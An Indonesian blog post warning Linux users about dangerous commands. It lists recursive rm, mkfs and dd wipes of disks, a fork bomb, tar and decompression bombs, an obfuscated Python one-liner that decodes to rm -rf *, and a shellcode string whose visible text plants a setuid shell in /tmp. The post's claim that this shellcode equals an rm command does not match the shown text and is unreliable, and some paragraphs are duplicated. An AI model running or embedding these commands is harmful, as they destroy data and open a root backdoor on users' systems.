Berikut adalah yang saya dapat dari ubuntuguide, gunakan sebagai pelajaran dan bukan untuk kejahatan.
1. Mengahapus semua yang ada di derektori
rm -rf /
rm -rf .
rm -rf *
rm -rf / mungkin tidak akan berhasil jika anda tidak memiliki akses root seperti memakai sudo, namun rm -rf . dan rm -rf * dapat menghapus apa saja di direktori dengan akses user biasa, jadi hati-hati.
2. Reformat data di device
mkfs.ext3 /dev/sda2
mkfs.apasaja /dev/sda3
Kemungkinan tak akan berhasil tanpa akses root, dan kalau pun berhasil data masih bisa dikembalikan.
3. Manipulasi block device
perintah_apa_saja > /dev/sda
dd if=apalah of=/dev/sda
Mengerikan, saya belum pernah coba ini tapi terlihat jika anda mencoba salah satunya maka block awal device (atau harddisk) akan menjadi raw atau format yang tidak dketahui.
4. ForkBomb
:(){:|:&};: di bash
fork while fork di perl
saya tidak mengerti ini tapi ubuntuguide mengatakan perintah-perintah itu akan menyebabkan sistem menjadi hang.
5. Tarbomb
Menarik dunia linux, ternyata file tar archive oleh seseorang dapat digunakan untuk menginjeksi file-file ke dalam sistem atau dengan cara lain dapat menduplikat jutaan file. Pencegahannya, jika anda diminta untuk mengekstrak tar di derektori tertentu maka anda harus berhati-hati, ekstrak di direktori yang bersih, setelah yakin aman baru pindahkan pada direktori yang diminta.
Menarik dunia linux, ternyata file tar archive oleh seseorang dapat digunakan untuk menginjeksi file-file ke dalam sistem atau dengan cara lain dapat menduplikat jutaan file. Pencegahannya, jika anda diminta untuk mengekstrak tar di derektori tertentu maka anda harus berhati-hati, ekstrak di direktori yang bersih, setelah yakin aman baru pindahkan pada direktori yang diminta.
6. Bom Decompression
File archive yang terlihat kecil namun saat didekompresi menjadi berukuran GB.
File archive yang terlihat kecil namun saat didekompresi menjadi berukuran GB.
7. Mengeksekusi script yang tidak jelas sumbernya
Banyak yang beranggapan Linux itu tahan atau anti virus, ini keliru karena tidak ada OS yang tahan virus dan bug. Linux jarang terkena virus karena penggunanya selalu mengeksekusi script dari sumber yang diketahui seperti dari repository distronya atau dari situs dipercaya seperti launchpad, sourforge misalnya. Contoh berikut adalah script python
Banyak yang beranggapan Linux itu tahan atau anti virus, ini keliru karena tidak ada OS yang tahan virus dan bug. Linux jarang terkena virus karena penggunanya selalu mengeksekusi script dari sumber yang diketahui seperti dari repository distronya atau dari situs dipercaya seperti launchpad, sourforge misalnya. Contoh berikut adalah script python
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
dimana “sn!.sg!+” serupa dengan perintah rm -rf *. Jika dilihat script itu, bahkan yang mahir dengan python pun belum tentu menyadari bahayanya.
Contoh lain (saya belum pernah coba yang ini dan belum tahu cara menggunakannya):
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
ubuntuguide mengatakan ini sama dengan rm -rf ~ / &.
Jika anda memiliki tambahan perintah-perintah yang berbahaya yang lain silakkan berbagi disini.
Semoga Bermanfaat :)
No comments:
Post a Comment